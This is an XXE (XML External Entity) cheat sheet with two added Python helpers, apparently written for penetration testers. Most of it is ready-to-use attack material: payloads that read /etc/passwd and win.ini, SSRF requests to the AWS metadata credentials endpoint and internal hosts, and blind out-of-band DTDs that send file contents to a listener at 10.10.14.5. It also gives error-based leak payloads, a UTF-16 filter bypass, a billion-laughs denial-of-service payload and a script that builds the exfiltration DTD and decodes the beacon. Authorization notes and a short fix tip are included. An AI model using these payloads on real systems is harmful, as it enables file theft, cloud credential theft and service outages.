XXE (XML External Entity) Cheat Sheet
XML External Entity payloads for file read, SSRF, blind out-of-band exfiltration, and denial of service on authorized targets.
Overview
XXE abuses XML parsers that resolve external entities declared in a DOCTYPE. If an endpoint accepts XML (SOAP, SAML, file uploads that are XML inside such as SVG or DOCX, REST with Content-Type: application/xml), you can define an external entity to read local files, reach internal services (SSRF), or exfiltrate data out-of-band when output isn't reflected. Start by injecting a DOCTYPE with a harmless custom entity into a value the response echoes back: if the reference comes back expanded, the parser processes DTDs and entities and the payloads below apply.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
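The mechanism the Overview describes, shown in code as an added example that is not part of the original cheat sheet: Python's standard-library xml.sax parser with external general entity resolution switched on (the vulnerable setting some applications enable) next to its default, hardened setting. The payload is the classic file-read one from the next section, pointed at a temporary file with constructed contents instead of /etc/passwd; the same document re-encoded as UTF-16 shows the encoding bypass still resolves. The secret string, file names and the handler class are the example's own assumptions.

```python
"""Added example: an xml.sax parser that resolves external general entities
(vulnerable) next to the stdlib default (hardened). Not from the cheat sheet."""
import io
import os
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


class NameCollector(xml.sax.handler.ContentHandler):
    """Records the text that ends up inside <name>, i.e. the reflected value."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, tag, attrs):
        if tag == "name":
            self._inside = True

    def endElement(self, tag):
        if tag == "name":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def parse_name(payload: bytes, resolve_external: bool) -> str:
    """Parse an XML document and return the text of <name>.

    resolve_external=True mirrors an application that turned on
    feature_external_ges (the vulnerable setting). False is the stdlib
    default since Python 3.7.1: the external entity is simply skipped.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external)
    handler = NameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return "".join(handler.parts)


def build_payload(target_uri: str, encoding: str = "UTF-8") -> bytes:
    """Classic file-read payload from the cheat sheet, aimed at target_uri.

    encoding="UTF-16" re-encodes the whole body, so a keyword filter that
    looks for the ASCII bytes of 'DOCTYPE' sees nothing; expat detects the
    byte-order mark and parses it anyway.
    """
    doc = (
        f'<?xml version="1.0" encoding="{encoding}"?>'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{target_uri}">]>'
        '<root><name>&xxe;</name></root>'
    )
    return doc.encode(encoding.lower())


def run_demo() -> dict:
    """Stand-in for /etc/passwd: a temp file with constructed content."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("hunter2")  # constructed secret, deliberately one line
        secret_path = f.name
    try:
        uri = pathlib.Path(secret_path).as_uri()  # file:///... on any OS
        return {
            "vulnerable": parse_name(build_payload(uri), resolve_external=True),
            "hardened": parse_name(build_payload(uri), resolve_external=False),
            "utf16_bypass": parse_name(build_payload(uri, "UTF-16"), resolve_external=True),
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for label, value in run_demo().items():
        print(f"{label:13s} -> {value!r}")
```

The vulnerable run returns the file contents in place of &xxe;, the hardened run returns an empty string, and the UTF-16 body leaks just like the UTF-8 one. In production code keep the default off and, for untrusted input, prefer a parser that rejects DOCTYPE outright such as defusedxml.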
Detect & read a local file
Classic file read: replace a reflected value with &xxe; and the file contents come back in the response
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name>&xxe;</name></root>
Windows target file
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
Base64 wrapper to read PHP source (PHP targets only; avoids parse errors caused by < and & in the file)
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
SSRF via XXE
Hit the cloud metadata endpoint. An entity fetch is a bare GET with no custom headers, so this only works against AWS IMDSv1: IMDSv2 needs a PUT token exchange first, and GCP and Azure require a Metadata-Flavor or Metadata request header the parser cannot send.
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">]>
Reach an internal-only service
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://10.0.0.5:8080/internal">]>
Blind / out-of-band (OOB)
External DTD hosted on your server (evil.dtd). The nested declaration must spell its percent sign as &#x25;: a bare % inside an entity value is read as the start of a parameter-entity reference, which is a well-formedness error, whereas &#x25; only becomes % once %eval; is expanded.
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://10.10.14.5/?x=%file;'>">
%eval;
%exfil;
Caveat: the file contents land in a URL, so newlines and other URL-unsafe characters break the request. Start with a single-line file such as /etc/hostname, or on PHP targets wrap the file in the php://filter base64 wrapper.
In-band stub that pulls the malicious DTD
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/evil.dtd"> %xxe;]><root>x</root>
Confirm OOB with a simple callback first (a hit on your listener proves the parser resolves external parameter entities even when nothing is reflected)
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.14.5/ping"> %xxe;]>
Variations & bypasses
Switch encoding to bypass naive keyword filters. Changing the declaration alone is not enough: re-encode the whole body (for example with iconv -f UTF-8 -t UTF-16) so the bytes no longer contain the ASCII string DOCTYPE, and send it with a matching charset.
<?xml version="1.0" encoding="UTF-16"?>
SVG upload XXE (image parsers often resolve entities)
<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hostname">]><svg>&xxe;</svg>
SOAP request injection point. The DOCTYPE has to precede the root element, so it goes ahead of <soap:Envelope>, and the entity reference goes into a Body field the service echoes back
<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>...&xxe;...</soap:Body></soap:Envelope>
If errors are verbose, error-based XXE can leak file contents in the error message. The classic payload only does this when the parser quotes the resolved value in its error; the reliable form is an external DTD (loaded with the same in-band stub as in the OOB section) that uses the file contents as part of a nonexistent path, so the "failed to load external entity" error quotes them
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
Billion laughs (DoS — lab only)
Entity expansion DoS: each level references the previous one ten times, so a handful of levels expands to billions of characters and exhausts parser memory
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">...]>
Destructive. Only in an authorized, isolated lab. Many parsers cap entity expansion by default, so a parser that survives this is not thereby shown to be safe against the file-read payloads above.
Tips
- If the value isn't reflected, go out-of-band: host an external DTD and exfiltrate to your server.
- Use php://filter base64 when reading files that would otherwise break XML parsing.
- Try changing Content-Type to application/xml on JSON endpoints — some parsers accept both.
- Fix: disable DTD processing entirely if the application does not need it; otherwise turn off external general entity, parameter entity and external DTD resolution in the parser, and name the exact setting in your report.
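Helpers for the blind/OOB procedure above, as an added example that is not part of the cheat sheet: they build the external DTD with the percent sign correctly escaped, build the in-band stub, and decode the beacon that arrives at the listener, including the base64 case from the php://filter tip. The 10.10.14.5 listener address and the sample beacon values are constructed for the example.

```python
"""Added example: build the OOB exfiltration DTD and stub, then decode the
beacon the listener receives. Not from the cheat sheet's own code."""
import base64
import urllib.parse


def build_exfil_dtd(file_uri: str, listener_url: str) -> str:
    """External DTD (evil.dtd) that reads file_uri and sends it to listener_url.

    The nested ENTITY declaration spells its percent sign as &#x25;: a bare
    '%' inside an entity value is read as a parameter-entity reference and
    makes the DTD malformed, so the parser would stop before %eval; runs.
    """
    return (
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM \'{listener_url}?x=%file;\'>">\n'
        "%eval;\n"
        "%exfil;\n"
    )


def build_stub(dtd_url: str) -> str:
    """In-band document that makes the target fetch and evaluate the DTD."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>'
        "<root>x</root>"
    )


def decode_beacon(request_target: str, base64_encoded: bool = False) -> str:
    """Recover the exfiltrated value from the request-target of the beacon.

    request_target is the path-plus-query your listener logged, e.g.
    '/?x=web01'. Use base64_encoded=True when the file entity went through
    php://filter/convert.base64-encode, which is how multi-line files
    survive being placed in a URL.
    """
    query = urllib.parse.urlsplit(request_target).query
    value = urllib.parse.parse_qs(query, keep_blank_values=True).get("x", [""])[0]
    if base64_encoded:
        value = base64.b64decode(value).decode("utf-8", errors="replace")
    return value


if __name__ == "__main__":
    # Constructed listener and target for illustration.
    print(build_exfil_dtd("file:///etc/hostname", "http://10.10.14.5/"))
    print(build_stub("http://10.10.14.5/evil.dtd"))
    # A constructed beacon as it would appear in the listener's access log.
    print(decode_beacon("/?x=cm9vdDp4OjA6MAo%3D", base64_encoded=True))
```

Serve the DTD from the listener host and watch its access log; the beacon request-target is what decode_beacon takes. The base64 variant is the one to reach for as soon as the target file has more than one line.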